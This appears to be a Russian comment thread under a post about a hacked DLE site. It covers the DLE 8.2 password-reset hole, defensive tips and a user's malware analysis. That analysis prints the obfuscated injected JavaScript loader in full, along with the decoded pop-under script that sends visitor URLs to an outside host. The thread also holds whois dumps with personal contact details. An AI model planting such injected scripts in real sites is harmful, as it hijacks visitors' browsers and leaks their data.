Comments 45
Что то не грузится, задосили что ли уже?
+2
Информация об ip-адресе 81.222.236.68
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See www.ripe.net/db/support/db-terms-conditions.pdf
% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '81.222.236.0 — 81.222.236.255'
inetnum: 81.222.236.0 — 81.222.236.255
netname: TimeWeb
descr: Hosting Service Provider
country: RU
admin-c: AAB74-RIPE
tech-c: AAB74-RIPE
status: ASSIGNED PA
mnt-by: ELTEL-RIPE-MNT
source: RIPE # Filtered
person: Alexandr A Boykov
address: 13, Sedova st.
address: 192148, Saint-Petersburg
address: Russia
phone: +7 812 3341520
fax-no: +7 812 3341530
abuse-mailbox: abuse@timeweb.ru
nic-hdl: AAB74-RIPE
mnt-by: ELTEL-RIPE-MNT
source: RIPE # Filtered
Может так проще?
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See www.ripe.net/db/support/db-terms-conditions.pdf
% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '81.222.236.0 — 81.222.236.255'
inetnum: 81.222.236.0 — 81.222.236.255
netname: TimeWeb
descr: Hosting Service Provider
country: RU
admin-c: AAB74-RIPE
tech-c: AAB74-RIPE
status: ASSIGNED PA
mnt-by: ELTEL-RIPE-MNT
source: RIPE # Filtered
person: Alexandr A Boykov
address: 13, Sedova st.
address: 192148, Saint-Petersburg
address: Russia
phone: +7 812 3341520
fax-no: +7 812 3341530
abuse-mailbox: abuse@timeweb.ru
nic-hdl: AAB74-RIPE
mnt-by: ELTEL-RIPE-MNT
source: RIPE # Filtered
Может так проще?
+5
ftp? уже долгое время (на моей памяти 2 года), в сети существует нечто, что обходило ftp авторизацию и портило файлы типа index, default, main дописывая в них <script>, это происходило как на простых хостингах, так и на больших серверах, где отдельный персонал занимался администрированием. Проблему решили переходом на sftp.
+3
Этот скриптик появился в файле типа main.tpl, в шаблоне в общем. Т.к. был взломан админский аккаунт, то прописать в шаблон заразу — 5 секунд.
0
Я не могу утверждать, что дырок у нас нет, но у нас вся работа через консоль, интерфейса веб-администрирования нет. Пароли по всем правилам и перебора не было.
0
поэтому советую поставить на файлы шаблона права 666, а не 777 — ИМХО, шаблон нужно редактировать через FTP, а не через встроенные средства DLE ;)
-1
Авторизацию никто не обходит волшебным образом. Ломают или через другие сайты на сервере (даже при полусотне аккаунтов наверняка найдётся хотя бы один с бородатой багой), если у вас виртуальный хостинг, или через скрипты, установленные у вас же (особенно если они самописные или давно не обновлялись).
Зайдите на любой более-менее крупный «хак»-форум и обратите внимание, что там многие покупают/продают FTP аккаунты или веб-шеллы. Вот собственно с единственной целью, чтобы потом гнать «траффик» с пострадавших сайтов, на которых внедрят свой JS код.
Зайдите на любой более-менее крупный «хак»-форум и обратите внимание, что там многие покупают/продают FTP аккаунты или веб-шеллы. Вот собственно с единственной целью, чтобы потом гнать «траффик» с пострадавших сайтов, на которых внедрят свой JS код.
0
используйте стабильные версии продуктов и почаще обновляйтесь. вам поставили обычный сниффер, который тупо угоняет кукисы, сессии и все что с этим связано.
+1
Хм, а как его обнаружить? В исходном коде страницы ничего подозрительного. На сайт захожу с момента первого взлома только в режиме инкогнито (браузер Chrome)
0
режим инкогнито от этого не поможет, он предназначен, чтобы не оставлять следов после своей работы (история, кукисы, сессии, кэш...) — сессии, куки и прочее в этом режиме все равно цепляются. тут может помочь установка атрибутов файлов\папок на сервере в режим readonly и невозможность редактирования кода через веб-морду (даже админу).
я когда-то давно читал, что через гиф-файл можно было внедрить яваскрипт-код и он исполнялся при открытии этого файла.
также вероятно умельцы нащупали уязвимость в DLE или\и в IPB. эксплоиты к таким вещам оч быстро по инету располазются.
В исходном коде страницы ничего подозрительного
я когда-то давно читал, что через гиф-файл можно было внедрить яваскрипт-код и он исполнялся при открытии этого файла.
также вероятно умельцы нащупали уязвимость в DLE или\и в IPB. эксплоиты к таким вещам оч быстро по инету располазются.
+1
Далеко не всеми угнанными куки можно будет воспользоваться с другого хоста, особенно если прошло достаточно времени и сессия «умерла», разработчики популярных движков не все такие лапти. А вот втихаря внести какие-то изменения в админке (добавить админа, изменить данные) через CSRF-уязвимости — более реально.
0
Последнее время много пишут по этому поводу. И всегда присутствует DLE 8.2, так что скорее всего проблема в нем.
0
Лицензия DLE 8.2?
+2
UFO just landed and posted this here
Омг какой кошмар. Пошол исправлять. Большое спасибо за ценное указание!
0
Ужас. Попробовал на каком-то сайте из того списка — и сработало. Мне тут же сгенерировали новый пароль. Тут же написал администрации сайта о том, что их могут (и, в принципе, давно уже) взломать. Дал ссылку на этот топик.
0
Судя по информации на сайте dle, данной уязвимости подвержена только версия 8.2.
0
Углубимся в детали.
hxxp://softxx.ru/m
идем по адресу и получаем:
выполняем и получаем:
выполняем далее и получаем линк:
hxxp://lycosu.com/j3.php
внутри нас ожидает:
Далее смотреть смысла нет.
Что имеем в итоге:
hxxp://lycosu.com = hxxt://1under.ru
1under.ru — надежная партнерская программа вебмастеру
______________________
Текст подготовлен в Хабра Редакторе от © SoftCoder.ru
hxxp://softxx.ru/m
идем по адресу и получаем:
- j="%3Cscript%20language%3D%22Javascript%22%20type%3D%22text%2FJavascript%22%20charset%3D%22windows-1251%22%3Eeval%28function%28p%2Ca%2Cc%2Ck%2Ce%2Cd%29%7Be%3Dfunction%28c%29%7Breturn%20c.toString%2836%29%7D%3Bif%28%21%27%27.replace%28%2F%5E%2F%2CString%29%29%7Bwhile%28c--%29%7Bd%5Bc.toString%28a%29%5D%3Dk%5Bc%5D%7C%7Cc.toString%28a%29%7Dk%3D%5Bfunction%28e%29%7Breturn%20d%5Be%5D%7D%5D%3Be%3Dfunction%28%29%7Breturn%27%5C%5Cw%2B%27%7D%3Bc%3D1%7D%3Bwhile%28c--%29%7Bif%28k%5Bc%5D%29%7Bp%3Dp.replace%28new%20RegExp%28%27%5C%5Cb%27%2Be%28c%29%2B%27%5C%5Cb%27%2C%27g%27%29%2Ck%5Bc%5D%29%7D%7Dreturn%20p%7D%28%276.7%28%22%3C0%3E8%22%2B%22%3D5%3B%3C%5C%5C%2F%22%2B%220%3E%3C0%209%22%2B%224%3D%5C%5C%221%5C%5C%22%202%3D%5C%5C%223%2F1%5C%5C%22%20a%3D%5C%5C%22i%22%2B%22-g%5C%5C%22%20h%22%2B%22%3D%5C%5C%22f%3A%2F%2F%22%2B%22e.b%2Fc.d%5C%5C%22%3E%3C%5C%5C%2F0%3E%22%29%3B%27%2C19%2C19%2C%27script%7CJavascript%7Ctype%7Ctext%7Cnguage%7C4227%7Cdocument%7Cwrite%7Cizs%7Cla%7Ccharset%7Ccom%7Cj3%7Cphp%7Clycosu%7Chttp%7C1251%7Csrc%7Cwindows%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29%0A%3C%2Fscript%3E";j=j.replace(/Ь/g,"5C");j=j.replace(/А/g,"7C");j=j.replace(/С/g,"3D");document.write(unescape(j));
выполняем и получаем:
- <script language="Javascript" type="text/Javascript" charset="windows-1251">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('+e(c)+','g'),k[c])}}return p}('6.7("<0>8"+"=5;<,19,19,'script|Javascript|type|text|nguage|4227|document|write|izs|la|charset|com|j3|php|lycosu|http|1251|src|windows'.split('|'),,{}))
выполняем далее и получаем линк:
hxxp://lycosu.com/j3.php
внутри нас ожидает:
- ss=escape(window.location.href); rr=escape(document.referrer);
- w11=450; h11=450;
- x11=195; y11=195;
- $js_unzdrr930=;
- function tix_ukor930() {document.onmousemove=tip_ufforr940; }
- function tip_ufforr940() {document.onmouseup=jstwonderz930; document.onclick=jstwonderz930; document.onmouseover=tix_ukor930;}
- var zz1=setTimeout("tip_ufforr940()",400);
- var zz2=setTimeout("tip_ufforr940()",900);
- var zz3=setTimeout("tip_ufforr940()",1480);
- var zz4=setTimeout("tip_ufforr940()",1950);
- var zz5=setTimeout("tip_ufforr940()",990);
- var zz5=setTimeout("tip_ufforr940()",2100);
- document.onmouseover=tix_ukor930;
- document.onmousemove=tip_ufforr940;
- tip_ufforr940();
- document.onmouseup=jstwonderz930;document.onclick=jstwonderz930;function jstwonderz930(){ if($js_unzdrr930==) { $js_otkr_URL940="http://lyc"+"osy.com/on.php?id="+izs+"&ss="+ss+"&rr="+rr+"&tema=cliku"+"ndr"; $CookieTest930=navigator.cookieEnabled; if($CookieTest930) { $ISawAdvert940=js_fongetC930("2511uwtiiz_oqiy"+izs); if(!$ISawAdvert940) { $js_unzdrr930=$js_unzdrr930+1; $js_undrwins940=window.open($js_otkr_URL940,"_blank","toolbar=yes, location=yes, directories=yes, status=yes, menubar=yes, scrollbars=yes, resizable=yes, width="+w11+", height="+h11+", left="+x11+", top="+y11+", copyhistory=yes"); window.focus(); if($js_undrwins940) { js_ssetCooki930("2511uwtiiz_oqiy"+izs,1,13); $js_undrwins940.blur(); } } } }}function js_ssetCooki930($Name,$Value,$EndH){ var exdate=new Date(); $EndH=exdate.getHours()+$EndH; exdate.setHours($EndH); document.cookie=$Name+ "=" +escape($Value)+(($EndH==null) ? "" : ";expires="+exdate.toGMTString()+"; path=/;");}function js_fongetC930($Name){ if (document.cookie.length>) { $Start=document.cookie.indexOf($Name + "="); if ($Start!=-1) { $Start=$Start + $Name.length+1; $End=document.cookie.indexOf(";",$Start); if ($End==-1) $End=document.cookie.length; return unescape(document.cookie.substring($Start,$End)); } } return "";} var zz5=setTimeout("tix_ukor930()",1020); tip_ufforr940();
Далее смотреть смысла нет.
Что имеем в итоге:
hxxp://lycosu.com = hxxt://1under.ru
1under.ru — надежная партнерская программа вебмастеру
Наша партнерская программа предлагает владельцам сайтов (партнерам) выкуп трафика посредством следующих технологий: текстовая контекстная реклама, тизерная реклама, клик-андер, попандер (pop-under) баннер, FreeLink, растяжки в шапке (топлайн). Рекламодатели могут купить в нашей системе трафик необходимого таргетинга и объема.
Выкуп трафика производится по следующим ценам:
Стоимость 1000 хостов (уникальных IP) – 4 wmz
______________________
Текст подготовлен в Хабра Редакторе от © SoftCoder.ru
+17
DLE? И что, много его стоит ненуленного у людей? ССЗБ…
+1
Хочу отметить один момент — наличие страшной уязвимости DLE в версии 8.2 — можно сбросить пароль любого юзера.
Фикс по этой проблеме на сайте разработчика есть. Особой шумихи не было, т.к. фикс именовался стандартным названием «недостаточная фильтрация данных».
Вот ссылка на сайт разработчика по поводу бреши в системе восстановления пароля: dle-news
Фикс по этой проблеме на сайте разработчика есть. Особой шумихи не было, т.к. фикс именовался стандартным названием «недостаточная фильтрация данных».
Вот ссылка на сайт разработчика по поводу бреши в системе восстановления пароля: dle-news
0
Благодаря этой уязвимости, злоумышленнику не составляет труда получить доступ к админке сайта, и прописать в шаблон что угодно, посливать базы, залить шелл и т.д…
0
Блин, я невнимательный. bo2l раньше о этом же написал.
0
А администратору не составляет труда поставить на файлы шаблона права 644! Я никогда не понимал, зачем вообще редактировать шаблон из админки — во-первых неудобно, во-вторых небезопасно, что и было показано в этом топике.
0
«…злоумышленнику не составляет труда… посливать базы…»
создать файл .htaccess и прописать в него следующее:
RedirectMatch (.*).sql.*$ хттп://ваш_домен.ру
залить файл в папку /backup/
тоже не понимаю этого маразма — нахрена опять же снижать безопасность сайта, позволяя скачивать бекап базы напрямую через http? так еще и ссылку для скачивания нового бекапа ставят по окончании резервирования… что мешает делать это через FTP? видимо, лень…
кстати, на старых движках (ниже 8.2) так можно с легкостью увести бекап базы сайта методом подбора даты и времени (разумеется, если не стоит редирект и администрация вообще проделывает резервирование встроенными методами. Самое забавное, если ставят ежедневный бекап в строго указанное время...)
создать файл .htaccess и прописать в него следующее:
RedirectMatch (.*).sql.*$ хттп://ваш_домен.ру
залить файл в папку /backup/
тоже не понимаю этого маразма — нахрена опять же снижать безопасность сайта, позволяя скачивать бекап базы напрямую через http? так еще и ссылку для скачивания нового бекапа ставят по окончании резервирования… что мешает делать это через FTP? видимо, лень…
кстати, на старых движках (ниже 8.2) так можно с легкостью увести бекап базы сайта методом подбора даты и времени (разумеется, если не стоит редирект и администрация вообще проделывает резервирование встроенными методами. Самое забавное, если ставят ежедневный бекап в строго указанное время...)
0
На этой дыре поимели столько сайтов что DLE даже официально разослала страшное предупреждение всем клиентам и срочно попросила всех всё пофиксить. Могли бы для этих целей уже автоматический модуль сделать учитывая регулярность нахождения дыр в этом чудном двиге
0
Сегодня пришел ответ на письмо:
TimeWeb Abuse Team
Спасибо за Ваше сообщение.
VPS данного пользователя закрыт.
0
Sign up to leave a comment.
Что делать, если взламывают сайт?